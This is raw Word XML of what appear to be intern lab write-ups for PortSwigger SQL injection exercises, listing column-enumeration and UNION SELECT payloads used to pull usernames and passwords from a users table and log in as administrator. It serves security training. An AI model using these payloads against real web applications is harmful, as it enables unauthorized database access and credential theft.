    <w:p w14:paraId="16A06B46" w14:textId="567ABCC4" w:rsidR="00561584" w:rsidRDefault="00561584" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561584">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION select NULL, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00561584">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAINyM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00561584">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED521A" w14:textId="07E27B4A" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10736B77" w14:textId="001FF54C" w:rsidR="003B7E47" w:rsidRDefault="00561584" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65120D38" wp14:editId="5771A23C">
            <wp:extent cx="5731510" cy="3137535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="166167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757" name="Picture 1661677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37535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE7AAA" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E49BB4" w14:textId="3DF48DD1" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F378AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: Displayed </w:t>
      </w:r>
      <w:r w:rsidR="00561584">
        <w:t>the given string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93BAC9" w14:textId="77777777" w:rsidR="00561584" w:rsidRPr="004D516A" w:rsidRDefault="00561584" w:rsidP="00561584">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F34F46A" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Team Members Involved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08405718" w14:textId="77777777" w:rsidR="00F61831" w:rsidRDefault="00F61831" w:rsidP="00F61831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Sarthaka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Subhankara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Singh, Intern Id – 438</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759E52C" w14:textId="77777777" w:rsidR="00F61831" w:rsidRDefault="00F61831" w:rsidP="00F61831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Rahul </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>idha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Intern </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>d </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t> 194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB99E54" w14:textId="77777777" w:rsidR="00F61831" w:rsidRPr="004D516A" w:rsidRDefault="00F61831" w:rsidP="00F61831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t>Saswata Som</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>Intern Id - 364</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC2308" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Date Completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168AE51" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> August 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200027C2" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="02C4CF79" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="712074D4" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="6F2F6F22" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="3E514821" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="3CB07E56" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="38560DBA" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="7B0E11BC" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="44DC392E" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="0F5444D1" w14:textId="77777777" w:rsidR="00F24011" w:rsidRDefault="00F24011" w:rsidP="003B7E47"/>
    <w:p w14:paraId="1CB66F98" w14:textId="77777777" w:rsidR="00306458" w:rsidRDefault="00306458" w:rsidP="004D516A"/>
    <w:p w14:paraId="16FB9031" w14:textId="598349E3" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Lab Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD765EA" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="005C3973" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="005C3973">
        <w:t>SQL injection UNION attack, retrieving data from other tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45656808" w14:textId="77777777" w:rsidR="005C3973" w:rsidRPr="004D516A" w:rsidRDefault="005C3973" w:rsidP="004D516A"/>
    <w:p w14:paraId="216DB21A" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Vulnerability Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08565F19" w14:textId="57D2EFA9" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="005C3973">
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D71087" w14:textId="77777777" w:rsidR="005C3973" w:rsidRPr="005C3973" w:rsidRDefault="005C3973" w:rsidP="004D516A"/>
    <w:p w14:paraId="748AF8C7" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BCB81" w14:textId="671FA969" w:rsidR="00863D55" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Exploited a SQL injection vulnerability in the product category filter to enumerate the number of columns, confirm column data types, and then perform a UNION SELECT attack to extract all usernames and passwords from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D516A">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> table. Finally, logged in as the administrator user using the retrieved credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E6926E" w14:textId="77777777" w:rsidR="005C3973" w:rsidRPr="004D516A" w:rsidRDefault="005C3973" w:rsidP="004D516A"/>
    <w:p w14:paraId="26BFC8C2" w14:textId="69949459" w:rsidR="00863D55" w:rsidRDefault="00863D55" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lab description (as per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portswigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lab website)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B44987" w14:textId="77777777" w:rsidR="00863D55" w:rsidRDefault="00863D55" w:rsidP="00863D55">
      <w:r w:rsidRPr="00863D55">
        <w:t>This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952C16F" w14:textId="77777777" w:rsidR="00863D55" w:rsidRDefault="00863D55" w:rsidP="00863D55">
      <w:r w:rsidRPr="00863D55">
        <w:t>The database contains a different table called users, with columns called username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE538D" w14:textId="77777777" w:rsidR="005C3973" w:rsidRDefault="00863D55" w:rsidP="00863D55">
      <w:r w:rsidRPr="00863D55">
        <w:t>To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEFC29" w14:textId="0C8C498D" w:rsidR="00863D55" w:rsidRDefault="00863D55" w:rsidP="00863D55">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>End Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:t xml:space="preserve"> - Output the usernames and passwords in the users table and login as the administrator user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E313661" w14:textId="77777777" w:rsidR="005C3973" w:rsidRPr="00863D55" w:rsidRDefault="005C3973" w:rsidP="00863D55"/>
    <w:p w14:paraId="74BEB686" w14:textId="12C8898D" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="00CD4F62" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004D516A" w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00863D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidR="00EE15BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536D17FB" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirmed SQL injection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DE834" w14:textId="0067F19F" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Injected a single quote (') at the end of the URL after selecting </w:t>
      </w:r>
      <w:r w:rsidR="00CD4F62">
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101DB93" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Application responded with </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>, confirming SQL syntax error → hence injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F515139" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="00000000" w:rsidP="004D516A">
      <w:r>
        <w:pict w14:anchorId="43FE7D23">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5C1BC" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determined number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0634D2" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payloads tested in category filter URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782528DD" w14:textId="37E3D6A5" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 1--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → worked (sorted by 1st column</w:t>
      </w:r>
      <w:r w:rsidR="009633D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009633D3">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009633D3">
        <w:t xml:space="preserve"> here, the title</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F97D88" w14:textId="5134110D" w:rsidR="00CA2406" w:rsidRDefault="00CA2406" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00E64564">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E64564">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A609201" wp14:editId="7BCAF7A2">
            <wp:extent cx="5731510" cy="5104765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="16646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3045" name="Picture 16646330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104765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925CD89" w14:textId="48A03C77" w:rsidR="00E64564" w:rsidRDefault="00E64564" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC88203" w14:textId="73FD5DEB" w:rsidR="00E64564" w:rsidRDefault="00E64564" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A08EA78" wp14:editId="77CC8303">
            <wp:extent cx="5731510" cy="5104765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="110098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82673" name="Picture 11009826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104765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C854790" w14:textId="77777777" w:rsidR="00E64564" w:rsidRPr="004D516A" w:rsidRDefault="00E64564" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449D988D" w14:textId="73FC6D26" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2-- </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>→ worked (sorted by 2nd column</w:t>
      </w:r>
      <w:r w:rsidR="009633D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009633D3">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009633D3">
        <w:t xml:space="preserve"> here, the starting of each paragraph after the title</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1717365B" w14:textId="06FFA476" w:rsidR="00CA2406" w:rsidRPr="00CA2406" w:rsidRDefault="00CA2406" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E099A" w14:textId="62A11909" w:rsidR="00CA2406" w:rsidRDefault="00E64564" w:rsidP="00E64564">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594A5226" wp14:editId="4515FE60">
            <wp:extent cx="5731510" cy="5104765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1167134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34300" name="Picture 11671343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104765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E62606" w14:textId="77777777" w:rsidR="00E64564" w:rsidRPr="004D516A" w:rsidRDefault="00E64564" w:rsidP="00E64564"/>
    <w:p w14:paraId="6CF23336" w14:textId="77777777" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 3--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → internal server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEABB4" w14:textId="6948F116" w:rsidR="00CA2406" w:rsidRPr="00CA2406" w:rsidRDefault="00CA2406" w:rsidP="00E64564">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC5891" w14:textId="721367AD" w:rsidR="00CA2406" w:rsidRDefault="00E64564" w:rsidP="00E64564">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7D3F65" wp14:editId="40172AEA">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="202548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8724" name="Picture 2025487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3C6AEC15" w14:textId="77777777" w:rsidR="00E64564" w:rsidRPr="004D516A" w:rsidRDefault="00E64564" w:rsidP="00E64564"/>
    <w:p w14:paraId="22A37E3A" w14:textId="743677B9" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CA2406" w:rsidRPr="00CA2406">
        <w:t xml:space="preserve">3 – 1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>2 columns in query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E4837" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="00000000" w:rsidP="004D516A">
      <w:r>
        <w:pict w14:anchorId="15137BDD">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B955B52" w14:textId="77777777" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checked data type of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099712E3" w14:textId="77777777" w:rsidR="00B107DD" w:rsidRDefault="00B107DD" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067FAFD2" w14:textId="7E67F754" w:rsidR="00B107DD" w:rsidRPr="00B107DD" w:rsidRDefault="00B107DD" w:rsidP="00B107DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00B107DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uery syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE14B38" w14:textId="6B88CEDF" w:rsidR="00B107DD" w:rsidRDefault="00B107DD" w:rsidP="00B107DD">
      <w:r>
        <w:t>select a, b from products where category='Food &amp; Drink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4BBED" w14:textId="77777777" w:rsidR="00B107DD" w:rsidRPr="004D516A" w:rsidRDefault="00B107DD" w:rsidP="00B107DD"/>
    <w:p w14:paraId="7BDD1DA5" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
